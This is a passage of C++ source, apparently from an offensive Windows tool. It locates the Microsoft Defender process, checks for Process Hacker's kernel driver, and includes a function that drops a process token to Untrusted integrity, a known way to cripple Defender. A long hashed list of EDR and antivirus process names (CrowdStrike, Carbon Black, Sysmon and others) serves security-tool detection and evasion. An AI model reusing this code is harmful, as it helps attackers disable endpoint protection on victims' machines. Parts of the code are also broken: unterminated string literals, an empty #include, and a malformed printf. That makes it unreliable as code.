__FILEW__, __LINE__, GetLastError()); 243 | #endif 244 | break; 245 | } 246 | 247 | WCHAR SignaturePath[1025] = { 0 }; 248 | WCHAR DriverPath[1025] = { 0 }; 249 | 250 | wsprintfW(SignaturePath, L"%s\\ProcessHacker.sig", CurrentPath); 251 | wsprintfW(DriverPath, L"%s\\kprocesshacker.sys", CurrentPath); 252 | 253 | if (GetFileAttributesW(SignaturePath) != INVALID_FILE_ATTRIBUTES && GetFileAttributesW(DriverPath) != INVALID_FILE_ATTRIBUTES) 254 | { 255 | Result = true; 256 | } 257 | } while (false); 258 | 259 | return Result; 260 | } 261 | 262 | DWORD GetDefenderPID() 263 | { 264 | DWORD DefenderPID = 0; 265 | HANDLE SnapshotHandle = nullptr; 266 | 267 | do 268 | { 269 | SnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 270 | 271 | if (SnapshotHandle == INVALID_HANDLE_VALUE) 272 | { 273 | #ifdef _DEBUG 274 | Debug::DbgOutW(L"[ERROR] %s:%d | CreateToolhelp32Snapshot failed. Last error: %d\n", __FILEW__, __LINE__, GetLastError()); 275 | #endif 276 | break; 277 | } 278 | 279 | PROCESSENTRY32W ProcessEntry = { 0 }; 280 | ProcessEntry.dwSize = sizeof(PROCESSENTRY32W); 281 | 282 | if (!Process32FirstW(SnapshotHandle, &ProcessEntry)) 283 | { 284 | #ifdef _DEBUG 285 | Debug::DbgOutW(L"[ERROR] %s:%d | Process32FirstW failed. Last error: %d\n", __FILEW__, __LINE__, GetLastError()); 286 | #endif 287 | break; 288 | } 289 | 290 | while (Process32NextW(SnapshotHandle, &ProcessEntry)) 291 | { 292 | if (lstrcmpW(ProcessEntry.szExeFile, L"MsMpEng.exe") == 0) 293 | { 294 | DefenderPID = ProcessEntry.th32ProcessID; 295 | break; 296 | } 297 | } 298 | 299 | } while (false); 300 | 301 | if (SnapshotHandle) 302 | { 303 | CloseHandle(SnapshotHandle); 304 | } 305 | 306 | return DefenderPID; 307 | } 308 | 309 | BOOL MakeProcessTokenUntrusted(HANDLE TokenHandle) 310 | { 311 | BOOL Result = false; 312 | 313 | if (!TokenHandle) 314 | { 315 | return Result; 316 | } 317 | 318 | do 319 | { 320 | TOKEN_MANDATORY_LABEL TokenMandatoryLabel = { 0 }; 321 | 322 | TokenMandatoryLabel.Label.Sid = (PSID)Memory::Alloc(MAX_SID_SIZE); 323 | TokenMandatoryLabel.Label.Attributes = SE_GROUP_INTEGRITY; 324 | 325 | DWORD SidSize = MAX_SID_SIZE; 326 | 327 | if (!CreateWellKnownSid(WinUntrustedLabelSid, nullptr, TokenMandatoryLabel.Label.Sid, &SidSize)) 328 | { 329 | #ifdef _DEBUG 330 | Debug::DbgOutW(L"[ERROR] %s:%d | CreateWellKnownSid failed. Last error: %d\n", __FILEW__, __LINE__, GetLastError()); 331 | #endif 332 | break; 333 | } 334 | 335 | if (!SetTokenInformation(TokenHandle, TokenIntegrityLevel, &TokenMandatoryLabel, sizeof(TOKEN_MANDATORY_LABEL))) 336 | { 337 | #ifdef _DEBUG 338 | Debug::DbgOutW(L"[ERROR] %s:%d | SetTokenInformation failed. Last error: %d\n", __FILEW__, __LINE__, GetLastError()); 339 | #endif 340 | break; 341 | } 342 | 343 | Result = true; 344 | } while (false); 345 | 346 | return Result; 347 | } 348 | 349 | #define PRINT_API_HASH 1 350 | 351 | #ifdef PRINT_API_HASH 352 | 353 | const wchar_t* g_edrProc[] = { 354 | L"activeconsole.exe", 355 | L"0x53e11368,//1407259496 anti malware.exe 356 | L"0x097ba73d,//0159098685 anti-malware.exe 357 | L"0xc4d2cca4,//3302149284 antimalware.exe 358 | L"0x3c7aabb0,//1014672304 anti virus.exe 359 | L"0x3ad2d685,//0986896005 anti-virus.exe 360 | L"0xe0a0078c,//3768584076 antivirus.exe 361 | L"0xcd230ee2,//3441626850 appsense.exe 362 | L"0x53c63fcc,//1405501388 authtap.exe 363 | 0x66e4a6a2,//1726260898 avast.exe 364 | 0x88a8d921,//2292767009 avecto.exe 365 | 0x2d6b9c8f,//0762027151 canary.exe 366 | 0x8fd08345,//2412806981 carbonblack.exe 367 | 0xd217d363,//3524776803 carbon black.exe 368 | 0xfd76b470,//4252415088 cb.exe 369 | 0xda507edc,//3662708444 ciscoamp.exe 370 | 0x110fadd2,//0286240210 cisco amp.exe 371 | 0xd2c394f5,//3536033013 countercept.exe 372 | 0xdad2c006,//3671244806 countertack.exe 373 | 0xf6e46246,//4142162502 cramtray.exe 374 | 0xe7fe65b3,//3892209075 crssvc.exe 375 | 0x4398bfb0,//1134084016 crowdstrike.exe 376 | 0x13ce7a6a,//0332298858 csagent.exe 377 | 0x98530436,//2555577398 csfalcon.exe 378 | 0x44e12e97,//1155608215 csshell.exe 379 | 0xd00225d2,//3489801682 cybereason.exe 380 | 0xaef25f04,//2935119620 cyclorama.exe 381 | 0x1354491a,//0324290842 cylance.exe 382 | 0x0e9fcc53,//0245353555 cyoptics.exe 383 | 0x07048330,//0117736240 cyupdate.exe 384 | 0x0ff06c8b,//0267414667 cyvera.exe 385 | 0x3920c8ee,//0958449902 cyserver.exe 386 | 0x70373883,//1882667139 cytray.exe 387 | 0xd9f45600,//3656668672 darktrace.exe 388 | 0x5aaee70d,//1521411853 defendpoint.exe 389 | 0xaca8b574,//2896737652 defender.exe 390 | 0x4deadabc,//1307237052 eectrl.exe 391 | 0x40741dea,//1081351658 elastic.exe 392 | 0x8deb24e2,//2380997858 endgame.exe 393 | 0x0b4da651,//0189638225 f-secure.exe 394 | 0x5230bfba,//1378926522 forcepoint.exe 395 | 0x15c7d0ac,//0365416620 fireeye.exe 396 | 0x304a86b2,//0810190514 groundling.exe 397 | 0xda5c36e8,//3663476456 GRRservic.exe 398 | 0xdd192fc8,//3709415368 inspector.exe 399 | 0x2e6b88a0,//0778799264 ivanti.exe 400 | 0xf454d136,//4099199286 kaspersky.exe 401 | 0x6e20368d,//1847604877 lacuna.exe 402 | 0x692366ed,//1763927789 logrhythm.exe 403 | 0xe10e9bea,//3775831018 malware.exe 404 | 0xdc6881df,//3697836511 mandiant.exe 405 | 0x215b448c,//0559629452 mcafee.exe 406 | 0x4787dd87,//1200086407 morphisec.exe 407 | 0xcde73002,//3454480386 msascuil.exe 408 | 0x43bb262a,//1136338474 msmpeng.exe 409 | 0xc28a2b70,//3263834992 nissrv.exe 410 | 0xa8db4e8e,//2832944782 omni.exe 411 | 0xd4df3503,//3571397891 omniagent.exe 412 | 0xbbfae7db,//3153782747 osquery.exe 413 | 0x75bc7a84,//1975286404 palo alto networks.exe 414 | 0x90bff93f,//2428500287 pgeposervice.exe 415 | 0xfe68fb93,//4268293011 pgsystemtray.exe 416 | 0x5c083c8b,//1544043659 privilegeguard.exe 417 | 0x477e21d7,//1199448535 procwall.exe 418 | 0xf1069a55,//4043741781 protectorservic.exe 419 | 0xcf0da0ea,//3473776874 qradar.exe 420 | 0x04fae970,//0083552624 redcloak.exe 421 | 0x8013ecfc,//2148789500 secureworks.exe 422 | 0x1125040e,//0287638542 securityhealthservice.exe 423 | 0x657d9a46,//1702730310 semlaunchsv.exe 424 | 0xe84f41fb,//3897508347 sentinel.exe 425 | 0x840eb9a5,//2215557541 sepliveupdat.exe 426 | 0x8960e50d,//2304828685 sisidsservice.exe 427 | 0x12c78179,//0315064697 sisipsservice.exe 428 | 0x682d19c6,//1747786182 sisipsutil.exe 429 | 0x4644649e,//1178887326 smc.exe 430 | 0x2b0b6105,//0722166021 smcgui.exe 431 | 0x188c52cc,//0411849420 snac64.exe 432 | 0x049e81cf,//0077496783 sophos.exe 433 | 0xf3eccf74,//4092383092 splunk.exe 434 | 0x851dd205,//2233324037 srtsp.exe 435 | 0x6f145f71,//1863606129 symantec.exe 436 | 0xb79e2afb,//3080596219 symcorpu.exe 437 | 0x72ab1d00,//1923816704 symefasi.exe 438 | 0x7a67771d,//2053601053 sysinternal.exe 439 | 0x01ee32f0,//0032387824 sysmon.exe 440 | 0xa1e08a97,//2715847319 tanium.exe 441 | 0xdf3a9fc6,//3745161158 tda.exe 442 | 0x03149b15,//0051682069 tdawork.exe 443 | 0xe4725187,//3832697223 tpython.exe 444 | 0x11970980,//0295111040 vectra.exe 445 | 0x6c59b801,//1817819137 wincollect.exe 446 | 0xa1c45332,//2713998130 windowssensor.exe 447 | 0xf82de137,//4163756343 wireshark.exe 448 | 0xc8514b8d,//3360770957 threat.exe 449 | 0xa756c889,//2807482505 xagt.exe 450 | 0x797f398d,//2038380941 xagtnotif.exe 451 | 0xa4e4c29f//2766455455 mssense.exe 452 | }; 453 | 454 | #include 455 | 456 | void PrintHash() 457 | { 458 | BOOL found = FALSE; 459 | for (int i = 0; i < g_edrlistSize; i++) 460 | { 461 | DWORD hash = HashW(g_edrProc[i], StrLenW(pn), HASHING_SEED); 462 | } 463 | if (HashW(pn, StrLenW(pn), HASHING_SEED) == g_edrHashList[i]) 464 | { 465 | found = TRUE; 466 | break; 467 | } 468 | printf("%s", ); 469 | } 470 | #endif 471 | 472 | } --------------------------------------------------------------------------------